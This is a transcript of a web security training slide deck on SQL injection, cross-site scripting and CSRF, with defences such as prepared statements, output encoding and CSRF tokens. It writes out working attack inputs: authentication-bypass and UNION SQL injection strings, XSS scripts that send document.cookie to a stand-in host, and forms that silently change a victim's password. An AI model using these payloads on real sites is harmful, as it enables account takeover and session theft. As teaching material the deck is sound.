S e c u r i t y A p p l i c at i o n s · 2018-11-13 · C r o s s - S i t e R e q u e s t F o r g...
Transcript of S e c u r i t y A p p l i c at i o n s · 2018-11-13 · C r o s s - S i t e R e q u e s t F o r g...
© Grzegorz Goławski (@ggolawski)
WebWebApplicationsApplications
SecuritySecurityGrzegorz Goławski (@ggolawski)Grzegorz Goławski (@ggolawski)
© Grzegorz Goławski (@ggolawski)
SQL Injection: Did you know?SQL Injection: Did you know?SQL Injection is still the most popular vulnerabilityLeads to biggest data breachesHeartland Payment Systems
130 million credit card details stolen
© Grzegorz Goławski (@ggolawski)
SQL Injection: BypassingSQL Injection: Bypassingauthenticationauthentication
String username = request.getParameter("username"); String password = request.getParameter("password"); result = stmt.executeQuery("SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "' LIMIT 1"); if (result.next()) { // User authenticated } else { // Authentication failure }
© Grzegorz Goławski (@ggolawski)
SQL Injection: BypassingSQL Injection: Bypassingauthenticationauthentication
username = admin password = Pa$$w0rd
SELECT * FROM users WHERE username = '{{username}}' AND password = '{{password}}' LIMIT 1
SELECT * FROM users WHERE username = 'admin' AND password = 'Pa$$w0rd' LIMIT 1
© Grzegorz Goławski (@ggolawski)
SQL Injection: BypassingSQL Injection: Bypassingauthenticationauthentication
username = admin password = ' OR '1'='1' --
SELECT * FROM users WHERE username = '{{username}}' AND password = '{{password}}' LIMIT 1
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1' --' LIMIT 1
if (result.next()) { // User authenticated } else { // Authentication failure }
© Grzegorz Goławski (@ggolawski)
SQL Injection: RetrievingSQL Injection: Retrievingsensitive datasensitive data
model = GolfSELECT * FROM cars WHERE owner = 'user1' AND model = '{{model}}'
SELECT * FROM cars WHERE owner='user1' AND model='Golf'
© Grzegorz Goławski (@ggolawski)
SQL Injection: RetrievingSQL Injection: Retrievingsensitive datasensitive data
model = ' OR 1=1 --SELECT * FROM cars WHERE owner = 'user1' AND model = '{{model}}'
SELECT * FROM cars WHERE owner='user1' AND model='' OR 1=1 --'
© Grzegorz Goławski (@ggolawski)
SQL Injection: RetrievingSQL Injection: Retrievingsensitive datasensitive data
Can we retrieve data from other, more interesting table?Yes! How can we do this?UNION operator model = x' UNION SELECT * FROM users --
SELECT * FROM cars WHERE owner='user1' AND model='{{model}}'
SELECT * FROM cars WHERE owner='user1' AND model='x' UNION SELECT * FROM users --'
© Grzegorz Goławski (@ggolawski)
SQL Injection Protection:SQL Injection Protection:Parameters BindingParameters Binding
String query = "SELECT * FROM users WHERE username = '" + username + "'"; PreparedStatement pstmt = connection.prepareStatement(query);
String query = "SELECT * FROM users WHERE username = ?"; PreparedStatement pstmt = connection.prepareStatement(query); pstmt.setString(1, username);
© Grzegorz Goławski (@ggolawski)
Parameters Binding: HowParameters Binding: Howdoes it work?does it work?
username = ' OR 1=1 --
String query = "SELECT * FROM users WHERE username = ?"; PreparedStatement pstmt = connection.prepareStatement(query); pstmt.setString(1, username);
SELECT * FROM users WHERE username = ''' OR 1=1 --'
© Grzegorz Goławski (@ggolawski)
SQL Injection: SummarySQL Injection: SummaryNumber 1 security vulnerability in web applicationsCan lead to unauthorized access, data breaches and/ordatabase alterationPrevention: parameters binding (prepared statements)
© Grzegorz Goławski (@ggolawski)
Injection: ReferencesInjection: References2. Parameterize Queries
OWASP Proactive Controls
OWASP Application Security Veri�cation Standard: V5 Input validation and output encodingTesting for SQL InjectionTesting for Command InjectionTesting for ORM InjectionOWASP Injection Prevention Cheat SheetOWASP SQL Injection Prevention Cheat SheetOWASP Injection Prevention Cheat Sheet in JavaOWASP Query Parameterization Cheat SheetCWE-77: Command InjectionCWE-89: SQL InjectionCWE-564: SQL Injection: HibernateCWE-917: Expression Language InjectionServer-Side Template Injection
© Grzegorz Goławski (@ggolawski)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)Enables attackers to inject client-side script into Web pages viewed byother usersRe�ected (non-persistent) XSS
The XSS payload is included in URL and re�ected on the web pagePersistent XSS
The XSS payload is injected persistently into the application (e.g. into thedatabase)
© Grzegorz Goławski (@ggolawski)
Re�ected XSSRe�ected XSSid = 99<div>No car with id {id}</div>
ht tps://carsbook.com/car?id=99
<div>No car with id 99</div>
© Grzegorz Goławski (@ggolawski)
Re�ected XSSRe�ected XSSid = <script>alert('xss')</script><div>No car with id {id}</div>
ht tps://carsbook.com/car?id=<script>alert('xss')</script>
<div>No car with id <script>alert('xss')</script></div>
© Grzegorz Goławski (@ggolawski)
What JavaScriptpayload would
you send?
© Grzegorz Goławski (@ggolawski)
Persistent XSSPersistent XSSIf input values being stored persistently are not validated, attackercan enter malicious data, e.g. as a car name:
When anyone loads the car’s page, malicious script runsThe script will by executed every time anybody opens the page
No need to send malicious links
Car name <script>alert('xss')</script>
© Grzegorz Goławski (@ggolawski)
XSS PayloadsXSS PayloadsSite defacement<script> var img = document.createElement("img"); img.src = "https://hackersite.com/images/hacked.png"; document.getElementById("car-list").insertBefore(img, document.getElementById("car-list").firstChild); </script>
© Grzegorz Goławski (@ggolawski)
XSS PayloadsXSS PayloadsStealing cookies using iframe<script> document.write('' + '<iframe src="https://hackersite.com/log?cookie='+document.cookie+'" height=0 width=0/>' ) </script>
© Grzegorz Goławski (@ggolawski)
XSS PayloadsXSS PayloadsStealing cookies using XMLHttpRequest<script> var req = new XMLHttpRequest(); req.open('GET', 'https://hackersite.com/log?cookie='+document.cookie, false); req.send(null); </script>
© Grzegorz Goławski (@ggolawski)
XSS PayloadsXSS PayloadsHow to inject JavaScript code without using <script>?
Event attributes, e.g. onerror<img src="nonexisting" onerror="alert('xss')">
© Grzegorz Goławski (@ggolawski)
XSS Protection: XSS Protection: EncodingEncodingCharacter Encoded
& & amp;
< & lt;
> & gt;
" & quot;
' & #x27;
/ & #x2F;
Good news: modern frameworks do this for you
© Grzegorz Goławski (@ggolawski)
XSS Example: XSS Example: Safari BooksSafari Books
© Grzegorz Goławski (@ggolawski)
© Grzegorz Goławski (@ggolawski)
XSS: SummaryXSS: SummaryRe�ected and persistentCan lead to site defacement, session cookie leakage or anyJavaScript code execution in the victims' browsersPrevention: Output encoding
© Grzegorz Goławski (@ggolawski)
Cross-Site Scripting (XSS): ReferencesCross-Site Scripting (XSS): References3. Encode Data4. Validate all inputs
OWASP Proactive Controls
OWASP ASVS: V5 Input validation and output encodingTesting for Re�ected Cross site scriptingTesting for Stored Cross site scriptingTesting for DOM-based Cross site scriptingXSS Prevention Cheat SheetDOM based XSS Prevention Cheat SheetXSS Filter Evasion Cheat SheetOWASP Java Encoder ProjectCWE-79: XSSClient-side template injectionContent Security Policy (CSP)Subresource Integrity (SRI)
© Grzegorz Goławski (@ggolawski)
Do you rememberwhat is the 3rdvulnerability?
© Grzegorz Goławski (@ggolawski)
Cross-Site Request ForgeryCross-Site Request Forgery(CSRF)(CSRF)
Occurs when attacker causes a user’s web browser to perform anunwanted action on a trusted site for which the user is currentlyauthenticatedPossible, because browsers automatically include any credentialsassociated with the site, such as the user's session cookieThe site will have no way to distinguish between the forged andlegitimate requests
© Grzegorz Goławski (@ggolawski)
CSRF ExampleCSRF ExampleAttacker must trick victim's browser send the crafted HTTP request
By clicking the malicious link
By visiting malicious site containing fake image
By visiting the trusted site vulnerable to XSS attackMalicious link or image can be injected
<a href="https://carsbook.com/changePassword?password=pwd">Click me!</a>
<img src="https://carsbook.com/changePassword?password=pwd" width="0" height="0" border="0">
© Grzegorz Goławski (@ggolawski)
CSRF ExampleCSRF ExampleWhat if application uses POST?
But this requires the user to click the submit button
<form action="https://carsbook.com/user/changePassword" method="POST"> <input type="hidden" name="password" value="pwd"> <input type="submit" value="View my pictures"> </form>
<body onload="document.forms[0].submit()">
© Grzegorz Goławski (@ggolawski)
CSRF Prevention:CSRF Prevention:Unpredictable tokenUnpredictable token
Embed additional token into requests
Validate the token on the server side
<form action="/user/changePassword" method="POST"> <input type="hidden" name="csrftoken" value="KbyUmhTLMpYj7CD2di7JKP1P3q"> ... </form>
© Grzegorz Goławski (@ggolawski)
CSRF Prevention: CSRF Prevention: DoubleDoublesubmit cookiesubmit cookie
The web application sets a cookie with random token
JavaScript on the client side reads it and copies it into a customHTTP header
Compare the tokens from cookie and the HTTP header on theserver sideNo need to store tokens on the server side
Set-Cookie: token=i8XNjC4b8KVouwha7867g32KG63jGT1M; expires=[...]; Max-Age=31449600; Path=/
X-Csrf-Token: i8XNjC4b8KVouwha7867g32KG63jGT1M
© Grzegorz Goławski (@ggolawski)
CSRF: SummaryCSRF: SummaryPerform unwanted action on the target web site without user'sknowledgeCan lead to execution of any action allowed on the web sitePrevention: unpredictable token or double submit cookie
© Grzegorz Goławski (@ggolawski)
Cross-Site Request Forgery:Cross-Site Request Forgery:ReferencesReferences
CSRF AttackReviewing code for Cross-Site Request Forgery issuesCSRF Prevention Cheat SheetTesting for CSRFOWASP CSRFGuard ProjectCWE-352: Cross-Site Request Forgery
© Grzegorz Goławski (@ggolawski)
Go to your codeand �x it!
© Grzegorz Goławski (@ggolawski)
Thank You!Thank You!